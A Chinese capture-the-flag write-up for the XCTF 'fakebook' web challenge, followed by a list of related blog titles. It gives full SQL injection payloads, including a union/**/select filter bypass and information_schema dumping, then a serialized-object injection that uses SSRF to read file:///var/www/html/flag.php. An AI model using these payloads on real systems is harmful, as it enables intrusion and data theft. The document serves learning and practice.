攻防世界-web-fakebook-从0到1的解题历程writeup
题目分析
拿到题目发现有注册登录界面,一般给了注册界面的很少会是sql注入登陆界面的,所以尝试先注册一个账号。
发现这边会加载注册时填写的blog地址,并将内容加载到一个iframe中。
这时发现网址为
http://159.138.137.79:55692/view.php?no=1
感觉就是有sql注入漏洞,虽然不知道考点在不在这,但是先注了再说。
尝试了一下就发现是数字型注入
sqlmap一把梭失败emmm
尝试下手工注入
获取到列数位4列
http://159.138.137.79:55692/view.php?no=1 order by 4#
查询数据库
http://159.138.137.79:55692/view.php?no=-1 union select 1,1,1,database()#
果然,找到了sqlmap失败的原因。既然这边有过滤那么本题不出意外考点应该就在这里了。
解题思路
第一步找到过滤掉了哪些。
尝试了一下发现过滤了union select
使用union/**/select绕过
http://159.138.137.79:55692/view.php?no=-6 union/**/select 1,2,3,4#
发现username处显示出来了,其余地方为反序列化失败。所以先在username处将数据带出。
http://159.138.137.79:55692/view.php?no=-6 union/**/select 1,database(),3,4
得到database为fakebook
http://159.138.137.79:55692/view.php?no=-6 union/**/select 1,(SELECT GROUP_CONCAT(TABLE_NAME) FROM information_schema.tables WHERE TABLE_SCHEMA="fakebook"),3,4
得到表名为users
http://159.138.137.79:55692/view.php?no=-6 union/**/select 1,(SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'users'),3,4
得到字段为no,username,passwd,data
明显no,username,passwd为账号基本信息,查询data
http://159.138.137.79:55692/view.php?no=-6 union/**/select 1,(SELECT GROUP_CONCAT(data) FROM fakebook.users),3,4
得到
将得到的data传入联合查询第四列的返回结果
发现可以成功解析。
使用nikto对网站进行扫描发现
有user.php的备份文件
function get($url){$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$output = curl_exec($ch);$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);if($httpCode == 404) {return 404;}curl_close($ch);return $output;}
这边get传入的就是用户信息中的blog地址,如果不是404就会将内容读出来。
存在ssrf文件读取
http://159.138.137.79:55692/view.php?no=-6 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:9;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'
读取file:///var/www/html/flag.php即可
攻防世界-web-fakebook-从0到1的解题历程writeup相关推荐
- 攻防世界web高手进阶区ics-05(XCTF 4th-CyberEarth)WriteUp
文章目录 解题部分 总结: 解题部分 题目来源 攻防世界web高手进阶区ics-05(XCTF 4th-CyberEarth) 1.拿到题目以后,发现是一个index.php的页面,并且设备-没有显示 ...
- 攻防世界-web高手进阶区
文章目录 攻防世界-web高手进阶区 1.baby_web 2.Training-WWW-Robots 3.Web_php_include (文件包含+伪协议) 1.方法 2.方法 4.ics-06( ...
- CTF:攻防世界web PART01
写在前面: 此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出.欢迎各位前来交流.(部分材料来源网络,若有侵权,立即删除) 攻防世界web PART01 baby_web Traini ...
- 攻防世界——web新手题
攻防世界----web新手题 1. robots 打开题目场景,发现与robots协议有关,上网搜索robots协议的内容: Robots协议(也称为爬虫协议.机器人协议等)的全称是"网络爬 ...
- 攻防世界 web高手进阶区 10分题 weiphp
前言 继续ctf的旅程 开始攻防世界web高手进阶区的10分题 本文是weiphp的writeup 解题过程 进入界面 点击 进入一个登陆界面 没有注册 那肯定得找源码了 惯例源码+御剑 发现git泄 ...
- 攻防世界Web题 - unseping 总结
攻防世界Web题 - unseping 总结 1.审题 进入题目,可以看出来是典型的php反序列化题目. 2.源代码分析 <?php highlight_file(__FILE__); //显示 ...
- 攻防世界 web高手进阶区 8分题 Web_python_block_chain
前言 继续ctf的旅程 开始攻防世界web高手进阶区的8分题 本文是Web_python_block_chain的writeup 解题过程 这是个区块链题 这..裂开了啊 没搞过区块链 从零开始学习 ...
- 攻防世界web进阶区Web_php_wrong_nginx_config详解
攻防世界web进阶区Web_php_wrong_nginx_config详解 题目 详解 题目 打开发现无论我们输入什么他都会弹出网站建设不完全 那么我们使用御剑进行扫描,扫描到了admin和robo ...
- 攻防世界-web新手区wp
攻防世界-web新手区wp view source robots backup cookie disabled_button weak auth simple php get_post xff_ref ...
- 攻防世界WEB进阶之ics-05
攻防世界WEB进阶之ics-05 1.描述 2.实操 3.答案 1.描述 难度系数: 3星 题目来源: XCTF 4th-CyberEarth 题目描述:其他破坏者会利用工控云管理系统设备维护中心的后 ...
最新文章
- python 字符串拼接
- 北科大matlab,北科大matlab第五次作业多项式及其相关计算.doc
- 汇编:OF溢出标志位
- JSplitPane
- <scope>test</scope>的作用
- 学习手记(2018/7/14~2018/7/18)——快乐纪中
- SQL Server 2000数据库移植到SQL Server 2008R2数据库服务器中碰到的”3145错误”及解决办法...
- 815. Bus Routes
- 大一新生计算机课word知识,大学新生计算机基础分层考试结果探析与启发.doc
- linux安装版本的python,linux安装python各种版本.md
- python返回菜单_返回上一菜单
- c语言中保存到文件中,急求如何将下列C语言程序数据存储到文件中?
- 栈和队列基本概念,顺序栈的表示和实现
- javascript当中iframe的用法
- 案例▍Python实战 爬取万条票房数据分析2019春节档电影状况
- virtualization technology设置
- python的spider程序下载_开源网络爬虫程序(spider)一览
- 如何辨别论文是不是SCI/EI?
- 【Java开发】中国的公历转农历-工具类
- Tyrion (含示例源码)
热门文章
- 八十八、CSS两列三列的布局方式
- Python 和 C/C++ 拓展程序的性能优化
- CVPR 2021 | 天津大学提出PISE:形状与纹理解耦的人体图像生成与编辑方法
- 贝叶斯神经网络对梯度攻击的鲁棒性
- 深度神经网络实践:车牌识别
- HDU 1853 HDU 3488【有向环最小权值覆盖问题 】带权二分图匹配 KM算法
- HDU 1243 最长公共子序列 动态规划
- 华为语音解锁设置_华为手机备忘录的秘密功能
- 操作系统系列「一」OPERATING SYSTEMS THREE EASY PIECES 《操作系统导论》
- 第一次安装Intellij IDEA过程中遇到的坑